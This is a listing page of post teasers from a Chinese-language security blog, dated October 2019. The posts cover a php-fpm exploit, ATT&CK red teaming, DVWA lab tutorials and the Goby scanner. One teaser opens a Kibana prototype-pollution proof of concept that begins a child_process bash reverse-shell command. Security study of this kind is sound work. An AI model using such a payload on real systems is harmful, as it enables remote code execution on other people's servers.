波波的寂寞世界

This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible...

讚(0)波波2019-10-23漏洞預警 閱讀(1881)

本文將探討如何利用ATT&CK站在攻擊者視角來組織和實踐Red Teaming行動，更加有針對性的模擬真實世界的攻擊者以達到“實戰養兵”的目的。 原文連結：https://mp.weixin.qq.com/s/u1cPkGegyRp...

讚(0)波波2019-10-23Blue Team 閱讀(2489)

POC: kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i...

讚(3)波波2019-10-18Web Security 閱讀(1504)

DVWA（Damn Vulnerable Web Application） DVWA（Damn Vulnerable Web Application）是一個用來進行弱點安全測試的網站系統，旨在為安全專業人員測試自己的專業技能和工具提供合法的...

讚(1)波波2019-10-18Web Security 閱讀(5131)

DVWA（Damn Vulnerable Web Application） DVWA（Damn Vulnerable Web Application）是一個用來進行弱點安全測試的網站系統，旨在為安全專業人員測試自己的專業技能和工具提供合法的...

讚(0)波波2019-10-18Web Security 閱讀(2683)

DVWA（Damn Vulnerable Web Application） DVWA（Damn Vulnerable Web Application）是一個用來進行弱點安全測試的網站系統，旨在為安全專業人員測試自己的專業技能和工具提供合法的...

讚(1)波波2019-10-07Web Security 閱讀(2706)

原文地址： https://mp.weixin.qq.com/s?__biz=MzU5MjEzOTM3NA==&mid=2247486209&idx=1&sn=61f8cbef53fe525d9d9858ed6902...

讚(0)波波2019-10-04未分類 閱讀(1557)

什麼是 GOBY ? Goby 是一套基於cyberspace mapping technology的安全掃描工具，適用於Windows、Linux、MacOS，該產品可針對目標網路進行全面的資產識別，生成對網路安全事件和漏洞的緊急響應。 ...

讚(3)波波2019-10-02安全工具 閱讀(2040)

DVWA（Damn Vulnerable Web Application） DVWA（Damn Vulnerable Web Application）是一個用來進行弱點安全測試的網站系統，旨在為安全專業人員測試自己的專業技能和工具提供合法的...

讚(1)波波2019-10-02Web Security 閱讀(3172)

DVWA（Damn Vulnerable Web Application） DVWA（Damn Vulnerable Web Application）是一個用來進行弱點安全測試的網站系統，旨在為安全專業人員測試自己的專業技能和工具提供合法的...

讚(2)波波2019-09-30Web Security 閱讀(3580)